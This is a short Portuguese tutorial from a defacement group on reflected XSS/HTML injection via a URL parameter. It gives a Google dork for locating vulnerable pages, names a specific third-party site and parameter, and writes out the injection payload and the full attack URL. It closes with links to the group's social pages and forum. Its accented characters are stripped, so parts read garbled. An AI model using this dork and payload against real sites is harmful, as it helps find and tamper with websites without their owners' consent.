Escolar Documentos
Profissional Documentos
Cultura Documentos
Vulnerabilidade XSS Injetando Códigos Na URL PDF
Vulnerabilidade XSS Injetando Códigos Na URL PDF
XSS uma fala que ate pouco tempo teve uma grande repercusso por ter
sido encontrado em sites muitos famosos o que os programadores de web
no dava importncia para esta falha mais os hackers deram e ela foi
explorada de outras formas....
Neste tutorial vamos encontra o bsico de uma injeo de cdigos HTML
na URL do web site.
Dork: inurl:"/showcatrows.php CategoryID ="
Site com possvel vulnerabilidade:
http://2muchvector.com/showcatrows.php?CategoryID=41
Ao final do link vamos por os cdigos:
"><marquee><h1>Made In Brazil Deface</h1></marquee>
Ficando assim:
http://2muchvector.com/showcatrows.php?CategoryID=41"><marquee><h
1>Made In Brazil Deface</h1></marquee>
e esta feita a mgica o comando marquee vai fazer o texto ficar passando
voc logo saber que o site vulnervel.
Grupo no Facebook:
https://www.facebook.com/groups/madeinbrazildeface/
Page Facebook: https://www.facebook.com/pages/Made-In-BrazilDefacement/160273920780806
Frum: http://madeinbrazil.umforum.net/forum